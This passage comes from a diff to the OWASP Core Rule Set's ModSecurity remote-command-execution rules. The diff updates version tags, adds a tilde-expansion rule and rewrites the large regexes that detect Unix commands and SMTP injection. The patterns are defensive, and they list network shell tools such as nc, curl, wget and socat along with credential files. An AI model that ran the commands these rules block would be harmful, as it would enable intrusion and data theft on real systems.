a-\{]*)?\x5c?y)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[gu]|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|[co][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|l)|(?:v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))" \
     "id:932220,\
     phase:2,\
     block,\
@@ -1132,9 +1154,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1195,13 +1218,14 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.932240_matched_var_name=%{matched_var_name}',\
     chain"
-    SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \
+    SecRule MATCHED_VARS "!@rx [0-9]\s*\'\s*[0-9]" \
         "t:none,\
         setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1237,9 +1261,46 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    severity:'CRITICAL',\
+    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+    setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# [ Unix shell expressions - Bash Tilde expansion ]
+# This rule is a sibling of rule 932270
+#
+# Detects the following patterns which are common in Unix shell scripts
+# and one-liners:
+#
+# ~4    fourth directory entry on the stack from the top
+#
+# Reference - https://linuxsimply.com/bash-scripting-tutorial/expansion/tilde-expansion/
+#
+# Regular expression generated from regex-assembly/932271.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+#   crs-toolchain regex update 932271
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[0-9]+" \
+    "id:932271,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:cmdLine,\
+    msg:'Remote Command Execution: Unix Shell Expression Found',\
+    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-shell',\
+    tag:'platform-unix',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
+    tag:'capec/1000/152/248/88',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1266,7 +1327,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932300
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n.*?\b(?:E(?:HLO [\-\.A-Za-z\x17f\x212a]{1,255}|XPN .{1,64})|HELO [\-\.A-Za-z\x17f\x212a]{1,255}|MAIL FROM:<.{1,64}@.{1,255}>|R(?:CPT TO:(?:<.{1,64}@.{1,255}>| )?<.{1,64}>|SET\b)|VRFY .{1,64}(?: <.{1,64}@.{1,255}>|@.{1,255})|AUTH [\-0-9A-Z_a-z\x17f\x212a]{1,20} (?:(?:[\+/-9A-Z_a-z\x17f\x212a]{4})*(?:[\+/-9A-Z_a-z\x17f\x212a]{2}=|[\+/-9A-Z_a-z\x17f\x212a]{3}))?=|STARTTLS\b|NOOP\b(?: .{1,255})?)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\r\n.*?\b(?:E(?:HLO[\s\x0b][\-\.a-z]{1,255}|XPN[\s\x0b].{1,64})|HELO[\s\x0b][\-\.a-z]{1,255}|MAIL[\s\x0b]FROM:<.{1,64}@.{1,255}>|R(?:CPT[\s\x0b]TO:(?:<.{1,64}@.{1,255}>| )?<.{1,64}>|SET\b)|VRFY[\s\x0b].{1,64}(?:[\s\x0b]<.{1,64}@.{1,255}>|@.{1,255})|AUTH[\s\x0b][\-0-9_a-z]{1,20}[\s\x0b](?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=|STARTTLS\b|NOOP\b(?:[\s\x0b].{1,255})?)" \
     "id:932300,\
     phase:2,\
     block,\
@@ -1279,9 +1340,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1311,9 +1373,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1345,9 +1408,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1393,7 +1457,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932236
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|an|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[^\s\x0b]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*